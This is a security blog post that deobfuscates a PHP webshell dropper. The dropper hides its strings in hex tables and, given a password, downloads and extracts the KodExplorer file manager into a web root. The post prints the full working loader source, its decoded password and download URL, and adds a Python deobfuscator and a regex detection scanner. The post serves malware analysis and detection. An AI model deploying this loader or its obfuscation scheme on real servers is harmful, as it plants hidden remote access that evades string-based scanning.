Analysis of a PHP mini-shell with a seriously clever trick

xhys121zero  2024-09-12  Source: SecHub 网络安全社区 (SecHub Cyber Security Community)


Analysis of a PHP mini-shell

Let's look at the PHP shell itself first:

```php
<?php
// Obfuscated dropper. Every string it needs is hidden as a hex blob inside a
// delimiter-separated list; pack("H*", ...) turns the hex back into text at
// run time, and constants defined from those strings are then used as
// $GLOBALS keys. The decoded meaning of each step is given in the comments.
// Note: the $arr{0} offset syntax used throughout is PHP 5/7 only; it was
// deprecated in 7.4 and removed in 8.0, so this sample will not run on PHP 8.

// Stage 1: a numeric constant. pack("H*", "41414741474747") = "AAGAGGG" and
// ord(1) = ord("1") = 49, so AAGAGGG === 49. It hides 0 and 1 later on.
if (!defined("AAAGAGA")) define("AAAGAGA", "AAAGAAG");
$GLOBALS[AAAGAGA] = explode("|^|K|3", "H*|^|K|341414741474747");

if (!defined(pack($GLOBALS[AAAGAGA][00], $GLOBALS[AAAGAGA][0x1]))) define(pack($GLOBALS[AAAGAGA][00], $GLOBALS[AAAGAGA][0x1]), ord(1));

// Stage 2: the function-name table. Decoded elements:
//   [1] = "AAGAGGA"  [2] = "AAGAGAG"  [3] = "|:|-|5"
//   [4] = "|:|-|5defined|:|-|5fopen|:|-|5fputs|:|-|5fclose|:|-|5is_file|:|-|5unlink"
if (!defined("AAAGGAA")) define("AAAGGAA", "AAAGAGG");
$GLOBALS[AAAGGAA] = explode("|v|t|Z", "H*|v|t|Z41414741474741|v|t|Z41414741474147|v|t|Z7C3A7C2D7C35|v|t|Z7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B");

// define("AAGAGGA", "AAGAGAG"); then
// $GLOBALS["AAGAGAG"] = ["", "defined", "fopen", "fputs", "fclose", "is_file", "unlink"]
if (!defined(pack($GLOBALS[AAAGGAA]{0}, $GLOBALS[AAAGGAA]{01}))) define(pack($GLOBALS[AAAGGAA]{0}, $GLOBALS[AAAGGAA]{01}), pack($GLOBALS[AAAGGAA]{0}, $GLOBALS[AAAGGAA][02]));
$GLOBALS[AAGAGGA] = explode(pack($GLOBALS[AAAGGAA]{0}, $GLOBALS[AAAGGAA]{3}), pack($GLOBALS[AAAGGAA]{0}, $GLOBALS[AAAGGAA][0x4]));

// Stage 3: the payload string table (decoded below in the write-up):
// password parameter name, password, download URL, file paths, response HTML.
if (!defined("AAAGGGA")) define("AAAGGGA", "AAAGGAG");
$GLOBALS[AAAGGGA] = explode("|K|H|a", "H*|K|H|a41414747414147|K|H|a646566696E65|K|H|a41414747414141|K|H|a70|K|H|a|K|H|a3070656e2e736573616d65|K|H|a687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970|K|H|a2E2F6B6F642E7A6970|K|H|a772B|K|H|a6B6F642E7A6970|K|H|a6B6F642F|K|H|a3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A");

// if (!defined("AAGGAAG")) call_user_func("define", "AAGGAAG", "AAGGAAA");
if (!$GLOBALS[AAGAGGA]{0x1}(pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA]{1}))) \call_user_func(pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA][02]), pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA]{1}), pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA]{03}));

// $GLOBALS["AAGGAAA"] = array($_GET);
$GLOBALS[AAGGAAG] = array(
  $_GET
);

// The readable names are leftovers of the un-obfuscated source; every use
// site was rewritten to go through a reference alias instead.
$AGAAAAG = & $passwd;
$AGAAAAA = & $ch;
$AAGGGGG = & $source;
$AAGGGGA = & $data;
$AAGGGAG = & $destination;
$file = & $AAGGGAA;
$AAGGAGG = & $zip;
$file_path = & $AAGGAGA;

// $passwd = isset($_GET["p"]) ? $_GET["p"] : "";   (0 - 1225 + 25 * 49 == 0)
$AGAAAAG = isset($GLOBALS[AAGGAAG][(0 - 1225 + 25 * AAGAGGG)][pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA]{4})])
  ? $GLOBALS[AAGGAAG][(0 - 1225 + 25 * AAGAGGG)][pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA]{4})]
  : pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA][05]);
// if ($passwd != "0pen.sesame") exit;
if ($AGAAAAG != pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA][06])) {
  exit;
}

// Download http://static.kodcloud.com/update/download/kodexplorer4.40.zip;
// CURLOPT_RETURNTRANSFER is set to 49 * 41 - 2008 == 1.
$AGAAAAA = curl_init();
$AAGGGGG = pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA]{07});
curl_setopt($AGAAAAA, CURLOPT_URL, $AAGGGGG);
curl_setopt($AGAAAAA, CURLOPT_RETURNTRANSFER, (AAGAGGG * 41 - 2008));
$AAGGGGA = curl_exec($AGAAAAA);
curl_close($AGAAAAA);

// $destination = "./kod.zip"; $file = fopen($destination, "w+");
// fputs($file, $data); fclose($file);
$AAGGGAG = pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA]{0x8});
$AAGGGAA = $GLOBALS[AAGAGGA]{02}($AAGGGAG, pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA][011]));
$GLOBALS[AAGAGGA]{03}($AAGGGAA, $AAGGGGA);
$GLOBALS[AAGAGGA]{0x4}($AAGGGAA);

// Extract "kod.zip" into "kod/" next to the shell.
$AAGGAGG = new ZipArchive();
if ($AAGGAGG->open(pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA][012])) === true) {
  $AAGGAGG->extractTo(pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA]{11}));
  $AAGGAGG->close();
}

// if (is_file("./kod.zip")) unlink("./kod.zip");   -- remove the evidence
$AAGGAGA = pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA]{0x8});
if ($GLOBALS[AAGAGGA]{05}($AAGGAGA)) {
  if ($GLOBALS[AAGAGGA][6]($AAGGAGA)) {
  }
}

// echo '<a href="./kod" target="_blank">执行成功点击进入</a>' . "\n";
echo pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA]{0xC});
?>
```

Go straight for the long strings. Start with the line that builds $GLOBALS[AAAGGAA]:

```php
$GLOBALS[AAAGGAA] = explode("|v|t|Z", "H*|v|t|Z41414741474741|v|t|Z41414741474147|v|t|Z7C3A7C2D7C35|v|t|Z7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B");
```

The explode function

It splits its second argument (the string) on its first argument (the delimiter) and returns the pieces as an array.

One example of explode makes this obvious:

image20240326193028075.png

Dumping the resulting $GLOBALS[AAAGGAA] array gives:

```text
Array
(
  [0] => H*
  [1] => 41414741474741
  [2] => 41414741474147
  [3] => 7C3A7C2D7C35
  [4] => 7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B
)
```

The elements of that array are then fed to pack(), e.g. echo pack("H*", "41414741474741");

The pack function

pack(string $format, mixed ...$values): string

Packs the given arguments into a binary string according to format.

pack() format characters

Code  Description
a     NUL-padded string
A     SPACE-padded string
h     Hex string, low nibble first
H     Hex string, high nibble first
c     signed char
C     unsigned char
s     signed short (16 bit, machine byte order)
S     unsigned short (16 bit, machine byte order)
n     unsigned short (16 bit, big endian byte order)
v     unsigned short (16 bit, little endian byte order)
i     signed integer (machine dependent size and byte order)
I     unsigned integer (machine dependent size and byte order)
l     signed long (32 bit, machine byte order)
L     unsigned long (32 bit, machine byte order)
N     unsigned long (32 bit, big endian byte order)
V     unsigned long (32 bit, little endian byte order)
q     signed long long (64 bit, machine byte order)
Q     unsigned long long (64 bit, machine byte order)
J     unsigned long long (64 bit, big endian byte order)
P     unsigned long long (64 bit, little endian byte order)
f     float (machine dependent size)
g     float (machine dependent size, little endian byte order)
G     float (machine dependent size, big endian byte order)
d     double (machine dependent size)
e     double (machine dependent size, little endian byte order)
E     double (machine dependent size, big endian byte order)
x     NUL byte
X     Back up one byte
Z     NUL-padded string
@     NUL-fill to absolute position

The only format the shell ever uses is "H*", so every call is equivalent to pack("H*", "41414741474741"): a hex string converted back into the bytes it encodes. Evaluating pack() with the array's [0] as the format and each of [1] to [4] as the data gives:

```text
[1] => AAGAGGA
[2] => AAGAGAG
[3] => |:|-|5
[4] => |:|-|5defined|:|-|5fopen|:|-|5fputs|:|-|5fclose|:|-|5is_file|:|-|5unlink
// [3] and [4] are then used the same way as the first explode() above:
// [3] is the delimiter and [4] the string, and splitting gives the function table:
(
  [0] =>
  [1] => defined
  [2] => fopen
  [3] => fputs
  [4] => fclose
  [5] => is_file
  [6] => unlink
)
```

Note that [1] and [2] decode to further constant names: define("AAGAGGA", "AAGAGAG") is executed, so $GLOBALS[AAGAGGA] is really $GLOBALS["AAGAGAG"], and that is where the function table ends up. Every function the shell later calls is looked up from this table by index, so the names defined, fopen, fputs, fclose, is_file and unlink never appear as literals in the file.

Next, the line that builds $GLOBALS[AAAGGGA]:

```php
$GLOBALS[AAAGGGA] = explode("|K|H|a", "H*|K|H|a41414747414147|K|H|a646566696E65|K|H|a41414747414141|K|H|a70|K|H|a|K|H|a3070656e2e736573616d65|K|H|a687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970|K|H|a2E2F6B6F642E7A6970|K|H|a772B|K|H|a6B6F642E7A6970|K|H|a6B6F642F|K|H|a3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A");
```

The same method gives this array:

```text
Array
(
  [0] => H*
  [1] => 41414747414147
  [2] => 646566696E65
  [3] => 41414747414141
  [4] => 70
  [5] =>
  [6] => 3070656e2e736573616d65
  [7] => 687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970
  [8] => 2E2F6B6F642E7A6970
  [9] => 772B
  [10] => 6B6F642E7A6970
  [11] => 6B6F642F
  [12] => 3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A
)
```

Decoding each element with pack() in turn yields:

```text
[1] => AAGGAAG
[2] => define
[3] => AAGGAAA
[4] => p
[5] =>
[6] => 0pen.sesame
[7] => http://static.kodcloud.com/update/download/kodexplorer4.40.zip
[8] => ./kod.zip
[9] => w+
[10] => kod.zip
[11] => kod/
[12] => <a href="./kod" target="_blank">执行成功点击进入</a>
```

([12] is the link returned on success; the anchor text means "executed successfully, click to enter".)
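Both tables above were recovered by hand with pack(). The script below is an added example (my own code, not part of the original post and not the shell author's tooling) that does the same recovery statically: it pulls every `$GLOBALS[NAME] = explode("DELIM", "H*DELIM...")` line out of the source, splits on the delimiter, decodes each hex element the way pack("H*") would, performs the second-level explode that produces the function table, and resolves the two numbers the shell hides behind the constant AAGAGGG. The three table lines are copied verbatim from the shell; the function and key names (decode_tables, summarize, "password_param", and so on) are my own.

```python
import re

# Constructed input: the three explode() lines copied verbatim from the shell.
# Only these lines are needed to recover every string the dropper uses.
SHELL_TABLES = r'''
$GLOBALS[AAAGAGA] = explode("|^|K|3", "H*|^|K|341414741474747");
$GLOBALS[AAAGGAA] = explode("|v|t|Z", "H*|v|t|Z41414741474741|v|t|Z41414741474147|v|t|Z7C3A7C2D7C35|v|t|Z7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B");
$GLOBALS[AAAGGGA] = explode("|K|H|a", "H*|K|H|a41414747414147|K|H|a646566696E65|K|H|a41414747414141|K|H|a70|K|H|a|K|H|a3070656e2e736573616d65|K|H|a687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970|K|H|a2E2F6B6F642E7A6970|K|H|a772B|K|H|a6B6F642E7A6970|K|H|a6B6F642F|K|H|a3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A");
'''

# Matches: $GLOBALS[NAME] = explode("DELIM", "BLOB");
TABLE_RE = re.compile(r'\$GLOBALS\[(\w+)\]\s*=\s*explode\("([^"]+)",\s*"([^"]*)"\);')


def php_pack_hstar(hexstr: str) -> str:
    """Mimic pack("H*", $hex): high nibble first; PHP treats a missing
    trailing nibble as 0. The result is decoded here as UTF-8 text."""
    if len(hexstr) % 2:
        hexstr += "0"
    return bytes.fromhex(hexstr).decode("utf-8", errors="replace")


def decode_tables(src: str) -> dict:
    """Return {table_name: [element0, decoded element1, ...]} for every
    explode()'d table whose element [0] is the pack format "H*". Element [0]
    is kept undecoded so indexes line up with the shell's own [n] references."""
    tables = {}
    for name, delim, blob in TABLE_RE.findall(src):
        parts = blob.split(delim)
        if parts[0] != "H*":          # the only pack() format this family uses
            continue
        tables[name] = [parts[0]] + [php_pack_hstar(h) for h in parts[1:]]
    return tables


def nested_explode(table: list, delim_idx: int, data_idx: int) -> list:
    """Second-level table: explode(pack("H*", t[delim]), pack("H*", t[data]))."""
    return table[data_idx].split(table[delim_idx])


def resolve_arithmetic() -> dict:
    """The shell defines AAGAGGG = ord(1), i.e. ord("1") == 49, and hides the
    values 0 and 1 behind arithmetic on it."""
    aagaggg = ord("1")
    return {
        "AAGAGGG": aagaggg,
        "get_index": 0 - 1225 + 25 * aagaggg,      # array($_GET)[0] -> $_GET
        "returntransfer": aagaggg * 41 - 2008,     # CURLOPT_RETURNTRANSFER = 1
    }


def summarize(src: str) -> dict:
    """Operational facts an analyst wants from this sample's table layout.
    The index positions are those of this specific sample."""
    t = decode_tables(src)
    s = t["AAAGGGA"]
    return {
        "functions": nested_explode(t["AAAGGAA"], 3, 4),
        "password_param": s[4],
        "password": s[6],
        "download_url": s[7],
        "zip_path": s[8],
        "fopen_mode": s[9],
        "zip_name": s[10],
        "extract_dir": s[11],
        "response_html": s[12],
        **resolve_arithmetic(),
    }


if __name__ == "__main__":
    for key, value in summarize(SHELL_TABLES).items():
        print(f"{key}: {value!r}")
```

Running it prints the same twelve strings listed above plus the function table; feeding it a different file from the same obfuscator only requires adjusting the index positions in summarize(), since decode_tables() and nested_explode() are generic.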

What the shell's author abuses is KodExplorer (可道云), an off-the-shelf web file manager.

In the decoded table, [4] ("p") is the name of the GET parameter that carries the password and [6] ("0pen.sesame", with a zero) is the password itself. The remaining arithmetic resolves through the constant defined at the top of the file: AAGAGGG is ord(1) = ord("1") = 49, so 0 - 1225 + 25 * 49 = 0 picks $_GET out of array($_GET), and 49 * 41 - 2008 = 1 turns on CURLOPT_RETURNTRANSFER.

Once the correct password is supplied, the server fetches the KodExplorer zip from static.kodcloud.com, writes it to ./kod.zip, extracts it into the kod/ directory alongside the shell, and deletes the zip. Nothing that remains on disk is a webshell in the usual sense: the dropped files are an unmodified copy of a legitimate file manager, and the loader itself contains no literal function names or URLs, which is what makes this approach hard to catch with string-based scanning.
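Because the dropped payload is a stock copy of KodExplorer, signatures for the file manager itself are of little use; what is distinctive is the loader's construction. The scanner below is an added example (my own code, not from the original post) with indicator names of my own choosing. Each indicator is a regex for one construction visible in the sample above: a hex table whose first element is the pack() format, pack() taking its format from a $GLOBALS table, a function invoked by indexing a $GLOBALS table, call_user_func() of a pack()ed name, a bare constant used as a $GLOBALS key, and curl_init() plus ZipArchive in one file. It is run over two constructed snippets, one lifted from the shell and one benign use of pack("H*"), and reports a hit only when several indicators fire together.

```python
import re

# One regex per construction seen in the sample. Indicator names are mine.
INDICATORS = {
    # explode("<delim>", "H*<delim>...") : hex table carrying its own pack() format
    "hex_table_with_pack_format": re.compile(r'explode\("([^"]+)",\s*"H\*\1'),
    # pack() whose format string is read from a $GLOBALS table, not a literal
    "pack_format_from_globals": re.compile(r'pack\(\s*\$GLOBALS\['),
    # $GLOBALS[X]{1}(...) or $GLOBALS[X][1](...) : function name pulled from a table
    "call_through_globals_table": re.compile(
        r'\$GLOBALS\[\w+\]\s*(?:\{\s*(?:0x[0-9a-fA-F]+|\d+)\s*\}|\[\s*(?:0x[0-9a-fA-F]+|\d+)\s*\])\s*\('),
    # call_user_func() whose target name is itself produced by pack()
    "call_user_func_of_pack": re.compile(r'call_user_func\(\s*pack\('),
    # bare constant as a $GLOBALS key (the constant is defined at run time)
    "constant_as_globals_key": re.compile(r'\$GLOBALS\[[A-Z_][A-Z0-9_]*\]'),
    # download-and-unpack behaviour in a single file
    "curl_zip_dropper": re.compile(r'curl_init\(.*ZipArchive', re.S),
}


def scan(src: str) -> dict:
    """Return {indicator_name: match_count} for every indicator that fires."""
    hits = {}
    for name, rx in INDICATORS.items():
        count = sum(1 for _ in rx.finditer(src))
        if count:
            hits[name] = count
    return hits


def verdict(src: str, threshold: int = 3) -> tuple:
    """(flagged, hits). A single indicator is weak on its own (pack("H*") and
    explode() are ordinary PHP); the combination is what is suspicious."""
    hits = scan(src)
    return (len(hits) >= threshold, hits)


# Constructed excerpt: a few lines lifted from the shell above.
MALICIOUS_EXCERPT = r'''<?php
$GLOBALS[AAAGAGA] = explode("|^|K|3", "H*|^|K|341414741474747");
if (!defined(pack($GLOBALS[AAAGAGA][00], $GLOBALS[AAAGAGA][0x1]))) define(pack($GLOBALS[AAAGAGA][00], $GLOBALS[AAAGAGA][0x1]), ord(1));
if (!$GLOBALS[AAGAGGA]{0x1}(pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA]{1}))) \call_user_func(pack($GLOBALS[AAAGGGA]{0x0}, $GLOBALS[AAAGGGA][02]), "AAGGAAG", "AAGGAAA");
$ch = curl_init();
$zip = new ZipArchive();
'''

# Constructed benign file: literal pack() format, quoted $GLOBALS key, no dynamic calls.
BENIGN_EXCERPT = r'''<?php
$raw = pack("H*", bin2hex($payload));
$parts = explode(",", "a,b,c");
$GLOBALS['config'] = array('debug' => false);
$zip = new ZipArchive();
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_EXCERPT), ("benign", BENIGN_EXCERPT)):
        flagged, hits = verdict(src)
        print(f"{label}: flagged={flagged} hits={hits}")
```

The threshold of three is a starting point, not a calibrated number; on a real web root you would tune it against the site's own code, and the two strongest single indicators are the hex table with an embedded "H*" format and a function call through a $GLOBALS table, neither of which normal application code produces.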

image20240326193418598.png

It then returns a link:

image20240326193432997.png

Clicking it opens the file manager directly:

image20240326193507792.png

All I can say is that the approach is genuinely clever.